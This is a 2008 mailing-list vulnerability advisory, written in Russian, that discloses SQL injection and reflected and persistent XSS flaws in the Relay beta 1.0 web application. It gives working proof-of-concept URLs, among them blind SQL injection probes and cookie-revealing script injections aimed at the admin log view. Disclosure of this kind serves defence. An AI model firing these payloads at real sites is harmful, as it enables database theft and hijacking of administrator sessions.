Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Tiger PHP News System SQL Injection

[ GLSA 200801-10 ] TikiWiki: Multiple vulnerabilities

Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability

Web Wiz Rich Text Editor Directory traversal + HTM/HTML file creation on the server

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	24.01.2008
Subject:	New vulnerabilities in Relay

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых SQL Injection и Cross-Site Scripting уязвимостях в
движке Relay. О предыдущих уязвимостях в Relay я писал ранее.

SQL Injection:

http://site/relay/management/index.
php?page=manage&module=users&action=details&uid=-
1%20or%20id=1

http://site/relay/management/index.
php?page=manage&module=users&action=details&uid=1%20and%20sub
string(username,1,1)=char(109)

http://site/relay/management/index.
php?page=manage&module=clients&action=details&cid=-
1%20or%20id=1

http://site/relay/management/index.
php?page=manage&module=clients&action=details&cid=1%20and%20s
ubstring(version(),1,1)=3

XSS:

http://site/relay/management/index.
php?page=manage&module=users&action=details&uid=%3Cscript%3Ea
lert(document.cookie)%3C/script%3E

http://site/relay/management/index.
php?page=manage&module=clients&action=details&cid=%3Cscript%3
Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

http://site/relay/relay.php?relay=getFile&fileid=-
1%20or%201=1/*%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвимость в логах. При просмотре логов админом на странице
http://site/relay/management/index.
php?page=stats&module=gen&action=latest XSS код
будет исполнен.

Уязвима версия Relay beta 1.0 (и предыдущие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1762/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua